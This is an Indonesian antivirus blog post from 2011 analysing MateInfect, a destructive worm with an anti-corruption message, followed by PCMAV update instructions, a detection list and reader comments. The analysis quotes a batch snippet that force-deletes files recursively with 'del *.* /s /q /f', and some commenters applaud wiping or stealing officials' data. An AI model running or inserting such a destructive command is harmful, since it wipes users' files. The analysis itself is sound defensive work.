Home > Analisa Virus, Antivirus, Pengumuman > MateInfect:Malware Khusus untuk Para Koruptor

MateInfect:Malware Khusus untuk Para Koruptor

November 10th, 2011 Leave a comment Go to comments

MateInfect. Gambar di atas adalah pesan yang disampaikan oleh MateInfect. Mungkin masih ingat dengan UltraSurf, yang memformat setiap local drive yang ada kecuali drive system-nya. MateInfect justru merupakan kebalikan dari UltraSurf karena kerusakan yang dihasilkan hampir tidak bisa diperbaiki, karena terhapusnya hampir secara keseluruhan file yang terdapat pada drive C:\ dan seolah mengizinkan file host maupun companionnya dihapus seiring dengan terhapusnya seluruh file system Windows.

A. Info File
Nama Malware : MateInfect
Asal : Bandung, Indonesia
Ukuran File : 221 KB (227,092 bytes)
Packer : ~
Pemrograman : Microsoft Visual C++
Icon : Malware Icon
Tipe : Worm, Trojan

B. About Malware
Sampelnya pertama kami dapatkan dari user yang IP-nya berasal dari kota Bandung. Sekilas seperti sebuah aplikasi biasa, namun hasil yang diakibatkan sangat diluar dugaan. Terhitung cukup jarang malware yang dibuat menggunakan C++ dan berasal dari Indonesia belakangan ini. Namun seperti biasa, ciri khas dari malware lokal adalah adanya pesan dari sang pembuat virus. Bisa dikatakan bahwa MateInfect hadir dengan membawa tema yang mengandung unsur politik seperti yang terlihat pada gambar di atas.

Seperti yang sudah dijelaskan sebelumnya, MateInfect menjalankan payload yang terbilang tidak wajar. File Windows baik itu *. exe ataupun *.dll, dihapus secara total. Dan akibatnya tidak diragukan lagi, sudah tentu akan mengakibatkan komputer tidak bisa melakukan proses booting ke sistem operasi Windows. Seperti pada gambar di bawah ini.

Namanya diambil dari companionnya yang tidak ditemukan keberadaannya, kemungkinan file tersebut memang tidak tercipta.

C. Companion/File yang dibuat
Sebelum memulai aksinya, MateInfect membuat beberapa companion yang cukup banyak keberadaannya.

MateInfect.bat
File bat dengan nama history.bat ini tidak akan muncul jika user sengaja melakukan analisa menggunakan Sandboxie. Dan dengan terpaksa harus dilakukan pengetesan secara langsung dengan cara mengaktifkan malware ini.

MateInfect.html
Pesan yang tergambarkan pada file HTML yang dibuat di folder system32 dengan nama HukumanBuatKoruptor.html.

MateInfect.lnk.A & MateInfect.lnk.B
Shortcut juga dibuat agar payload yang belum dilakukan oleh malware tetap dijalankan. Seperti salah satu shortut yang terdapat di folder startup dengan nama WinCleaner.lnk.

MateInfect.vbs.A & MateInfect.vbs.B
File VBS yang dibuat terdiri dari 2 buah fungsi. Pada variant A, berfungsi utuk mengeksekusi host dengan nama sMaD.jp dan file html yang dibuat. Sedangkan variant B memiliki peran sebagai pembuat file shortcut pada folder startup.

MateInfect.zip.A, MateInfect.zip.B & MateInfect.zip.C
Berisi host dari MateInfect yang kemudian di ekstrak dan dieksekusi.

D. Hasil Infeksi
Jika pada saat komputer korban terdapat flash disk yang sedang terhubung, MateInfect akan membuat folder RECYCLER yang didalamnya terdapat 2 buah folder yang tidak bisa dihapus secara manual.

Selain itu, tanpa disadari seluruh file yang terdapat di drive [C:\] satu persatu dihapus oleh MateInfect dengan perintah seperti ini:

@echo off
C:
cd \
cd "%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\*.default"
del *.* /s /q /f

E. Pembersihan

PAda PCMAV 6.0 update build terbaru ini telah dapat mengenali dan membasmi MateInfect.

PCMAV 6.0 Update Build2

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 6.0 Update Build2 telah hadir dengan penambahan 58 pengenal varian virus baru. Bagi Anda pengguna PCMAV 6.0, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt. Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:

SendSpace.com

ZippyShare.com (mirror)

RapidShare.com (mirror)

Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 6.0 Update Build2:
Aldey
AryaN
AryaN.inf
AryaN.lnk
Chat-FB.A
Chat-FB.B
Chat-FB.C
Chat-FB.D
Chat-FB.E
Chat-FB.F
Chat-FB.G
Chat-FB.H
Chat-FB.I
Chat-FB.zip.A
Chat-FB.zip.B
Chat-FB.zip.C
Chat-FB.zip.D
ChuanHua
ChuanHua.jpg
CoolServ
Craft3
Craft3.tmp
Ferrera
FontPorn.B
FontPorn.B.exe.A
FontPorn.B.exe.B
FontPorn.B.lnk
FontPorn.B.tmp
FontPorn.C
FontPorn.C.ini
MateInfect
MateInfect.bat
MateInfect.html
MateInfect.inf
MateInfect.lnk.A
MateInfect.lnk.B
MateInfect.vbs.A
MateInfect.vbs.B
MateInfect.zip.A
MateInfect.zip.B
MateInfect.zip.C
NgrBot.C.inf
NgrBot.I
NgrBot.J
NgrBot.J.exe.A
NgrBot.J.exe.B
None
NorTown
Ramnit.N.dropper
Ramnit.O.dropper
TheProxz
ThumbDrive
TODO
TODO.drp
TruB
TruB.exe
WinStmy
WinStmy.bat

Categories: Analisa Virus, Antivirus, Pengumuman Tags:
  1. zero
    November 10th, 2011 at 15:15 | #1

    seandainya di indonesia ada koruptor yang dihukum kayak gini.

  2. Reynaldo
    November 10th, 2011 at 19:29 | #2

    @zero
    ya!!!!! moga2 aja untuk para koruptor yang laen

  3. toge
    November 11th, 2011 at 12:04 | #3

    klo virus buat laptop ato komputer koruptor sih gpp.
    nah klo ini virus kena kita ya berabe.. -_-“

  4. Sandy
    November 11th, 2011 at 14:10 | #4

    paling bagus semua koruptor nangis – nangis kena virus ini + kalo bisa , sekalian datanaya dicuri , lalu disebar ke publik supaya ketawan korupsi dan nama mereka tercemar + tertangkap.

    But , antivirus PC Media is the best

  5. keshin
    November 11th, 2011 at 19:29 | #5

    Susah larr skrg virus untuk dibasmi, sampe pusing hrs pake antivirus apa yg terbaek

  6. November 15th, 2011 at 09:49 | #6

    virus ini klo nyerang senayan mantap nih

  7. prayitno
    November 15th, 2011 at 10:31 | #7

    @keshin : apa karena Virus selangkah lebih maju dari antinya…? Coz baru ada serum ketika muncul penyakitnya… betul (kiwil mode:on)
    Tapi paling tidak, selalu meng-update database antivirus yg kita punya adalah benteng pertahan PC terbaik. (catatan: tidak sembarangan colok usb yg ng’gak jelas, memoricard, hp or media lain penyebar utama virus, selain internet via program/softrae yg sudah dicrack) tentunya